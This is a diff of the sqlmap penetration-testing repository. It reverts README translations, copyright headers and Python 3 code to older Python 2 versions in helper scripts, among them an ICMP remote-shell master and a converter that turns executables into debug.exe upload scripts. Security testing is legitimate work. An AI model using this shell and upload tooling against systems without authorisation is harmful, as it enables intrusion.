[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
|
sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
|
||||||
|
|
||||||
@@ -11,7 +11,7 @@ Ekran görüntüleri
|
|||||||

|

|
||||||
|
|
||||||
|
|
||||||
İsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
|
İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
|
||||||
|
|
||||||
|
|
||||||
Kurulum
|
Kurulum
|
||||||
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
||||||
|
|
||||||
Kullanım
|
Kullanım
|
||||||
----
|
----
|
||||||
@@ -39,15 +39,15 @@ Bütün seçenekleri gösterir
|
|||||||
|
|
||||||
Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz
|
Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz
|
||||||
|
|
||||||
Bağlantılar
|
Links
|
||||||
----
|
----
|
||||||
|
|
||||||
* Anasayfa: https://sqlmap.org
|
* Anasayfa: http://sqlmap.org
|
||||||
* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues
|
* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki
|
* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,50 +0,0 @@
|
|||||||
# sqlmap 
|
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
|
||||||
|
|
||||||
sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання.
|
|
||||||
|
|
||||||
Скриншоти
|
|
||||||
----
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
Ви можете ознайомитися з [колекцією скриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), які демонструють деякі функції в wiki.
|
|
||||||
|
|
||||||
Встановлення
|
|
||||||
----
|
|
||||||
|
|
||||||
Ви можете завантажити останню версію tarball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або останню версію zipball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
|
||||||
|
|
||||||
Найкраще завантажити sqlmap шляхом клонування [Git](https://github.com/sqlmapproject/sqlmap) репозиторію:
|
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
|
||||||
|
|
||||||
sqlmap «працює з коробки» з [Python](https://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі.
|
|
||||||
|
|
||||||
Використання
|
|
||||||
----
|
|
||||||
|
|
||||||
Щоб отримати список основних опцій і перемикачів, використовуйте:
|
|
||||||
|
|
||||||
python sqlmap.py -h
|
|
||||||
|
|
||||||
Щоб отримати список всіх опцій і перемикачів, використовуйте:
|
|
||||||
|
|
||||||
python sqlmap.py -hh
|
|
||||||
|
|
||||||
Ви можете знайти приклад виконання [тут](https://asciinema.org/a/46601).
|
|
||||||
Для того, щоб ознайомитися з можливостями sqlmap, списком підтримуваних функцій та описом всіх параметрів і перемикачів, а також прикладами, вам рекомендується скористатися [інструкцією користувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
|
||||||
|
|
||||||
Посилання
|
|
||||||
----
|
|
||||||
|
|
||||||
* Основний сайт: https://sqlmap.org
|
|
||||||
* Завантаження: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
|
||||||
* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
|
||||||
* Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues
|
|
||||||
* Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki
|
|
||||||
* Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
|
||||||
* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
|
||||||
* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
||||||
@@ -1,52 +0,0 @@
|
|||||||
# sqlmap 
|
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
|
||||||
|
|
||||||
sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng tiêm SQL và tiếp quản các máy chủ cơ sở dữ liệu. Nó đi kèm với
|
|
||||||
một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện cơ sở dữ liệu, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập tệp của hệ thống và thực hiện các lệnh trên hệ điều hành từ xa.
|
|
||||||
|
|
||||||
Ảnh chụp màn hình
|
|
||||||
----
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), chúng trình bày một số tính năng có thể tìm thấy trong wiki.
|
|
||||||
|
|
||||||
Cài đặt
|
|
||||||
----
|
|
||||||
|
|
||||||
|
|
||||||
Bạn có thể tải xuống tập tin nén tar mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
|
||||||
|
|
||||||
Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone với [Git](https://github.com/sqlmapproject/sqlmap):
|
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
|
||||||
|
|
||||||
sqlmap hoạt động hiệu quả với [Python](https://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào.
|
|
||||||
|
|
||||||
Sử dụng
|
|
||||||
----
|
|
||||||
|
|
||||||
Để có được danh sách các tùy chọn cơ bản, hãy sử dụng:
|
|
||||||
|
|
||||||
python sqlmap.py -h
|
|
||||||
|
|
||||||
Để có được danh sách tất cả các tùy chọn, hãy sử dụng:
|
|
||||||
|
|
||||||
python sqlmap.py -hh
|
|
||||||
|
|
||||||
Bạn có thể xem video chạy thử [tại đây](https://asciinema.org/a/46601).
|
|
||||||
Để có cái nhìn tổng quan về các khả năng của sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh).
|
|
||||||
|
|
||||||
Liên kết
|
|
||||||
----
|
|
||||||
|
|
||||||
* Trang chủ: https://sqlmap.org
|
|
||||||
* Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
|
||||||
* Nguồn cấp dữ liệu RSS về commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
|
||||||
* Theo dõi vấn đề: https://github.com/sqlmapproject/sqlmap/issues
|
|
||||||
* Hướng dẫn sử dụng: https://github.com/sqlmapproject/sqlmap/wiki
|
|
||||||
* Các câu hỏi thường gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
|
||||||
* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
|
||||||
* Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
||||||
@@ -1,8 +1,8 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。
|
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
|
||||||
|
|
||||||
演示截图
|
演示截图
|
||||||
----
|
----
|
||||||
@@ -20,7 +20,7 @@ sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap 可以运行在 [Python](https://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上
|
sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上
|
||||||
|
|
||||||
使用方法
|
使用方法
|
||||||
----
|
----
|
||||||
@@ -38,12 +38,12 @@ sqlmap 可以运行在 [Python](https://www.python.org/download/) **2.6**, **2.
|
|||||||
链接
|
链接
|
||||||
----
|
----
|
||||||
|
|
||||||
* 项目主页: https://sqlmap.org
|
* 项目主页: http://sqlmap.org
|
||||||
* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
|
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -3,11 +3,12 @@
|
|||||||
"""
|
"""
|
||||||
beep.py - Make a beep sound
|
beep.py - Make a beep sound
|
||||||
|
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
import subprocess
|
||||||
import sys
|
import sys
|
||||||
import wave
|
import wave
|
||||||
|
|
||||||
@@ -15,13 +16,11 @@ BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")
|
|||||||
|
|
||||||
def beep():
|
def beep():
|
||||||
try:
|
try:
|
||||||
if sys.platform.startswith("win"):
|
if subprocess.mswindows:
|
||||||
_win_wav_play(BEEP_WAV_FILENAME)
|
_win_wav_play(BEEP_WAV_FILENAME)
|
||||||
elif sys.platform.startswith("darwin"):
|
elif sys.platform == "darwin":
|
||||||
_mac_beep()
|
_mac_beep()
|
||||||
elif sys.platform.startswith("cygwin"):
|
elif sys.platform == "linux2":
|
||||||
_cygwin_beep(BEEP_WAV_FILENAME)
|
|
||||||
elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")):
|
|
||||||
_linux_wav_play(BEEP_WAV_FILENAME)
|
_linux_wav_play(BEEP_WAV_FILENAME)
|
||||||
else:
|
else:
|
||||||
_speaker_beep()
|
_speaker_beep()
|
||||||
@@ -36,10 +35,6 @@ def _speaker_beep():
|
|||||||
except IOError:
|
except IOError:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
# Reference: https://lists.gnu.org/archive/html/emacs-devel/2014-09/msg00815.html
|
|
||||||
def _cygwin_beep(filename):
|
|
||||||
os.system("play-sound-file '%s' 2>/dev/null" % filename)
|
|
||||||
|
|
||||||
def _mac_beep():
|
def _mac_beep():
|
||||||
import Carbon.Snd
|
import Carbon.Snd
|
||||||
Carbon.Snd.SysBeep(1)
|
Carbon.Snd.SysBeep(1)
|
||||||
@@ -63,10 +58,7 @@ def _linux_wav_play(filename):
|
|||||||
class struct_pa_sample_spec(ctypes.Structure):
|
class struct_pa_sample_spec(ctypes.Structure):
|
||||||
_fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
|
_fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
|
||||||
|
|
||||||
try:
|
|
||||||
pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
|
pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
|
||||||
except OSError:
|
|
||||||
return
|
|
||||||
|
|
||||||
wave_file = wave.open(filename, "rb")
|
wave_file = wave.open(filename, "rb")
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -3,45 +3,42 @@
|
|||||||
"""
|
"""
|
||||||
cloak.py - Simple file encryption/compression utility
|
cloak.py - Simple file encryption/compression utility
|
||||||
|
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from __future__ import print_function
|
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import struct
|
|
||||||
import sys
|
import sys
|
||||||
import zlib
|
import zlib
|
||||||
|
|
||||||
from optparse import OptionError
|
from optparse import OptionError
|
||||||
from optparse import OptionParser
|
from optparse import OptionParser
|
||||||
|
|
||||||
if sys.version_info >= (3, 0):
|
def hideAscii(data):
|
||||||
xrange = range
|
retVal = ""
|
||||||
ord = lambda _: _
|
for i in xrange(len(data)):
|
||||||
|
if ord(data[i]) < 128:
|
||||||
|
retVal += chr(ord(data[i]) ^ 127)
|
||||||
|
else:
|
||||||
|
retVal += data[i]
|
||||||
|
|
||||||
KEY = b"ENWsCymUeJcXqSbD"
|
return retVal
|
||||||
|
|
||||||
def xor(message, key):
|
|
||||||
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
|
|
||||||
|
|
||||||
def cloak(inputFile=None, data=None):
|
def cloak(inputFile=None, data=None):
|
||||||
if data is None:
|
if data is None:
|
||||||
with open(inputFile, "rb") as f:
|
with open(inputFile, "rb") as f:
|
||||||
data = f.read()
|
data = f.read()
|
||||||
|
|
||||||
return xor(zlib.compress(data), KEY)
|
return hideAscii(zlib.compress(data))
|
||||||
|
|
||||||
def decloak(inputFile=None, data=None):
|
def decloak(inputFile=None, data=None):
|
||||||
if data is None:
|
if data is None:
|
||||||
with open(inputFile, "rb") as f:
|
with open(inputFile, "rb") as f:
|
||||||
data = f.read()
|
data = f.read()
|
||||||
try:
|
try:
|
||||||
data = zlib.decompress(xor(data, KEY))
|
data = zlib.decompress(hideAscii(data))
|
||||||
except Exception as ex:
|
except:
|
||||||
print(ex)
|
print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
|
||||||
print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
|
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
finally:
|
finally:
|
||||||
f.close()
|
f.close()
|
||||||
@@ -50,7 +47,7 @@ def decloak(inputFile=None, data=None):
|
|||||||
|
|
||||||
def main():
|
def main():
|
||||||
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
|
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
|
||||||
parser = OptionParser(usage=usage, version='0.2')
|
parser = OptionParser(usage=usage, version='0.1')
|
||||||
|
|
||||||
try:
|
try:
|
||||||
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
|
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
|
||||||
@@ -62,11 +59,11 @@ def main():
|
|||||||
if not args.inputFile:
|
if not args.inputFile:
|
||||||
parser.error('Missing the input file, -h for help')
|
parser.error('Missing the input file, -h for help')
|
||||||
|
|
||||||
except (OptionError, TypeError) as ex:
|
except (OptionError, TypeError), e:
|
||||||
parser.error(ex)
|
parser.error(e)
|
||||||
|
|
||||||
if not os.path.isfile(args.inputFile):
|
if not os.path.isfile(args.inputFile):
|
||||||
print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile)
|
print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if not args.decrypt:
|
if not args.decrypt:
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -3,14 +3,13 @@
|
|||||||
"""
|
"""
|
||||||
dbgtool.py - Portable executable to ASCII debug script converter
|
dbgtool.py - Portable executable to ASCII debug script converter
|
||||||
|
|
||||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from __future__ import print_function
|
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
|
import struct
|
||||||
|
|
||||||
from optparse import OptionError
|
from optparse import OptionError
|
||||||
from optparse import OptionParser
|
from optparse import OptionParser
|
||||||
@@ -20,7 +19,7 @@ def convert(inputFile):
|
|||||||
fileSize = fileStat.st_size
|
fileSize = fileStat.st_size
|
||||||
|
|
||||||
if fileSize > 65280:
|
if fileSize > 65280:
|
||||||
print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile)
|
print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
|
script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
|
||||||
@@ -33,7 +32,7 @@ def convert(inputFile):
|
|||||||
fileContent = fp.read()
|
fileContent = fp.read()
|
||||||
|
|
||||||
for fileChar in fileContent:
|
for fileChar in fileContent:
|
||||||
unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar)
|
unsignedFileChar = struct.unpack("B", fileChar)[0]
|
||||||
|
|
||||||
if unsignedFileChar != 0:
|
if unsignedFileChar != 0:
|
||||||
counter2 += 1
|
counter2 += 1
|
||||||
@@ -60,7 +59,7 @@ def convert(inputFile):
|
|||||||
|
|
||||||
def main(inputFile, outputFile):
|
def main(inputFile, outputFile):
|
||||||
if not os.path.isfile(inputFile):
|
if not os.path.isfile(inputFile):
|
||||||
print("ERROR: the provided input file '%s' is not a regular file" % inputFile)
|
print "ERROR: the provided input file '%s' is not a regular file" % inputFile
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
script = convert(inputFile)
|
script = convert(inputFile)
|
||||||
@@ -71,7 +70,7 @@ def main(inputFile, outputFile):
|
|||||||
sys.stdout.write(script)
|
sys.stdout.write(script)
|
||||||
sys.stdout.close()
|
sys.stdout.close()
|
||||||
else:
|
else:
|
||||||
print(script)
|
print script
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
|
usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
|
||||||
@@ -87,8 +86,8 @@ if __name__ == "__main__":
|
|||||||
if not args.inputFile:
|
if not args.inputFile:
|
||||||
parser.error("Missing the input file, -h for help")
|
parser.error("Missing the input file, -h for help")
|
||||||
|
|
||||||
except (OptionError, TypeError) as ex:
|
except (OptionError, TypeError), e:
|
||||||
parser.error(ex)
|
parser.error(e)
|
||||||
|
|
||||||
inputFile = args.inputFile
|
inputFile = args.inputFile
|
||||||
outputFile = args.outputFile
|
outputFile = args.outputFile
|
||||||
|
|||||||
Binary file not shown.
@@ -22,6 +22,7 @@
|
|||||||
import os
|
import os
|
||||||
import select
|
import select
|
||||||
import socket
|
import socket
|
||||||
|
import subprocess
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
def setNonBlocking(fd):
|
def setNonBlocking(fd):
|
||||||
@@ -36,7 +37,7 @@ def setNonBlocking(fd):
|
|||||||
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
|
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
|
||||||
|
|
||||||
def main(src, dst):
|
def main(src, dst):
|
||||||
if sys.platform == "nt":
|
if subprocess.mswindows:
|
||||||
sys.stderr.write('icmpsh master can only run on Posix systems\n')
|
sys.stderr.write('icmpsh master can only run on Posix systems\n')
|
||||||
sys.exit(255)
|
sys.exit(255)
|
||||||
|
|
||||||
@@ -76,7 +77,6 @@ def main(src, dst):
|
|||||||
decoder = ImpactDecoder.IPDecoder()
|
decoder = ImpactDecoder.IPDecoder()
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
try:
|
|
||||||
cmd = ''
|
cmd = ''
|
||||||
|
|
||||||
# Wait for incoming replies
|
# Wait for incoming replies
|
||||||
@@ -128,11 +128,9 @@ def main(src, dst):
|
|||||||
try:
|
try:
|
||||||
# Send it to the target host
|
# Send it to the target host
|
||||||
sock.sendto(ip.get_packet(), (dst, 0))
|
sock.sendto(ip.get_packet(), (dst, 0))
|
||||||
except socket.error as ex:
|
except socket.error, ex:
|
||||||
sys.stderr.write("'%s'\n" % ex)
|
sys.stderr.write("'%s'\n" % ex)
|
||||||
sys.stderr.flush()
|
sys.stderr.flush()
|
||||||
except:
|
|
||||||
break
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
if len(sys.argv) < 3:
|
if len(sys.argv) < 3:
|
||||||
|
|||||||
Binary file not shown.
17
extra/safe2bin/README.txt
Normal file
17
extra/safe2bin/README.txt
Normal file
@@ -0,0 +1,17 @@
|
|||||||
|
To use safe2bin.py you need to pass it the original file,
|
||||||
|
and optionally the output file name.
|
||||||
|
|
||||||
|
Example:
|
||||||
|
|
||||||
|
$ python ./safe2bin.py -i output.txt -o output.txt.bin
|
||||||
|
|
||||||
|
This will create an binary decoded file output.txt.bin. For example,
|
||||||
|
if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will
|
||||||
|
be decoded to: " test 234
|
||||||
|
newline"
|
||||||
|
|
||||||
|
If you skip the output file name, general rule is that the binary
|
||||||
|
file names are suffixed with the string '.bin'. So, that means that
|
||||||
|
the upper example can also be written in the following form:
|
||||||
|
|
||||||
|
$ python ./safe2bin.py -i output.txt
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
